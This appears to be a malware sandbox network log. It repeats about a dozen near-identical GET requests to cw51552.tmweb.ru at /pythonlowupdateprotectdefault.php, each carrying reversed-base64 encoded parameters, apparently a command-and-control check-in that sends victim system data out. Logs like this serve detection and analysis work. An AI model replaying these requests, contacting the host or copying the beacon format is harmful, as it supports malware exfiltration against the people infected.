Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIyV2Zh5WYNBSbhJ3ZvJHUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIyV2Zh5WYNBSbhJ3ZvJHUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIyV2Zh5WYNBSbhJ3ZvJHUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIyV2Zh5WYNBSbhJ3ZvJHUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
